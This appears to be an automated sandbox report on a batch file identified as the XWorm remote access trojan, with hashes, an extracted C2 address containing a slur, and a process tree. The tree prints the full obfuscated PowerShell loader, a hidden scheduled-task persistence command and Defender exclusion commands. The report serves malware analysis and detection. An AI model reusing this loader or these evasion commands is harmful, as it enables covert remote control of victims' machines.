Overview

overview

10

Static

static

1

EspooferFixed.bat

windows10-ltsc 2021-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20250113-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20250113-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    24-01-2025 15:00

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    EspooferFixed.bat

  • Size

    265KB

  • MD5

    b305aa4a553e75efdef58b62ab9a1363

  • SHA1

    14b80df7c7cd154275564d8678a99e99096bcbe4

  • SHA256

    3af55470fb8f6549631c51af8fb360e144b3a2213328251fb5c893afefd39b2a

  • SHA512

    ba37b738e73e85d8b4d5ec186c2469d533b94692f00ad07931287fed3bf3c7c9b17ed52f6e9289eb846ebfad25009d6ff1486880d91c45b63be96f276b45ba8f

  • SSDEEP

    6144:qo5yDFBOGJBGmR9BJTGPbL5aFPB9Wxo8W2823a8kyXQ5iDoaPz73HyXMft6E:HgFt7hR9BJSPP5yBUxosXQ5koab73Hy2

Score
10/10
xwormexecutionrattrojan

Malware Config

Extracted

Family

xworm

C2

IDKTOBEHONESTNIGAS-56344.portmap.io:56344

Mutex

GgTsuAV3pXf6aU6z

aes.plain

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Blocklisted process makes network request 64 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\EspooferFixed.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2372
    • C:\Windows\system32\net.exe
      net file
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4756
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 file
        3⤵
          PID:2312
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yeKLtf1YCHmqQ7MCDNc9FlnD43khnJ48NqLcoY7YtN4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rvPEd9GdqynNNz5vbAi1Yg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $tYXsr=New-Object System.IO.MemoryStream(,$param_var); $VsGOH=New-Object System.IO.MemoryStream; $PHuFH=New-Object System.IO.Compression.GZipStream($tYXsr, [IO.Compression.CompressionMode]::Decompress); $PHuFH.CopyTo($VsGOH); $PHuFH.Dispose(); $tYXsr.Dispose(); $VsGOH.Dispose(); $VsGOH.ToArray();}function execute_function($param_var,$param2_var){ $mniqI=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $fYbOB=$mniqI.EntryPoint; $fYbOB.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\EspooferFixed.bat';$fRtaI=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\EspooferFixed.bat').Split([Environment]::NewLine);foreach ($YdJlk in $fRtaI) { if ($YdJlk.StartsWith(':: ')) { $efvGy=$YdJlk.Substring(3); break; }}$payloads_var=[string[]]$efvGy.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4060
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_79_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_79.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2116
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_79.vbs"
          3⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:3420
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_79.bat" "
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1512
            • C:\Windows\system32\net.exe
              net file
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:3724
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 file
                6⤵
                  PID:4948
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yeKLtf1YCHmqQ7MCDNc9FlnD43khnJ48NqLcoY7YtN4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rvPEd9GdqynNNz5vbAi1Yg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $tYXsr=New-Object System.IO.MemoryStream(,$param_var); $VsGOH=New-Object System.IO.MemoryStream; $PHuFH=New-Object System.IO.Compression.GZipStream($tYXsr, [IO.Compression.CompressionMode]::Decompress); $PHuFH.CopyTo($VsGOH); $PHuFH.Dispose(); $tYXsr.Dispose(); $VsGOH.Dispose(); $VsGOH.ToArray();}function execute_function($param_var,$param2_var){ $mniqI=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $fYbOB=$mniqI.EntryPoint; $fYbOB.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_79.bat';$fRtaI=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_79.bat').Split([Environment]::NewLine);foreach ($YdJlk in $fRtaI) { if ($YdJlk.StartsWith(':: ')) { $efvGy=$YdJlk.Substring(3); break; }}$payloads_var=[string[]]$efvGy.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                5⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:2212
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  PID:2364
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  PID:2516

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
        Filesize

        3KB

        MD5

        3eb3833f769dd890afc295b977eab4b4

        SHA1

        e857649b037939602c72ad003e5d3698695f436f

        SHA256

        c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485

        SHA512

        c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        2e4e6cd714d0a6b24d21df4b15a8efef

        SHA1

        ea175071d140c16f803d5b372a1282e0297d18dc

        SHA256

        68b99a29dded5e875531cbaf532938c5b4663046cb45f0b079e36a1f6ec45644

        SHA512

        44b84a22db9d5c7b6e180643bab446ea7a3705f38321b96ddf6a2de663969984423656aab8c58d55428144c74f5a6c84227ac41d2559ab7fa6e35b8e03d1b25a

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        6a807b1c91ac66f33f88a787d64904c1

        SHA1

        83c554c7de04a8115c9005709e5cd01fca82c5d3

        SHA256

        155314c1c86d8d4e5b802f1eef603c5dd4a2f7c949f069a38af5ba4959bd8256

        SHA512

        29f2d9f30fc081e7fe6e9fb772c810c9be0422afdc6aff5a286f49a990ededebcf0d083798c2d9f41ad8434393c6d0f5fa6df31226d9c3511ba2a41eb4a65200

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gchfpnqq.o3b.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • C:\Users\Admin\AppData\Roaming\startup_str_79.vbs
        Filesize

        114B

        MD5

        ea7689b92bd40415e099221965437358

        SHA1

        7a16f0037daf94e1013249cc175f00745707c19c

        SHA256

        79b869ea9a520ef5ba9bb46ca7a7095bafdc8403108ad258582a14ca2fcbed93

        SHA512

        872b1086b540bd9684d6942cb508bfc8f26ee16028925dd1623f95b74bb861c5c96e8a5f158f7ca38e74bd74013350928e30ffb28f829a424c99b8db17c13885

        Download Submit

      • memory/2116-17-0x00007FF86D960000-0x00007FF86E422000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2116-29-0x00007FF86D960000-0x00007FF86E422000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2212-49-0x000002407A7A0000-0x000002407A7B0000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2212-72-0x000002407AB40000-0x000002407AB4A000-memory.dmp

        Filesize

        40KB

        Download

      • memory/4060-14-0x000002612F670000-0x000002612F678000-memory.dmp

        Filesize

        32KB

        Download

      • memory/4060-15-0x0000026149BF0000-0x0000026149C24000-memory.dmp

        Filesize

        208KB

        Download

      • memory/4060-0-0x00007FF86D963000-0x00007FF86D965000-memory.dmp

        Filesize

        8KB

        Download

      • memory/4060-13-0x00007FF86D960000-0x00007FF86E422000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4060-12-0x00007FF86D960000-0x00007FF86E422000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4060-11-0x00007FF86D960000-0x00007FF86E422000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4060-50-0x00007FF86D960000-0x00007FF86E422000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4060-1-0x000002612F630000-0x000002612F652000-memory.dmp

        Filesize

        136KB

        Download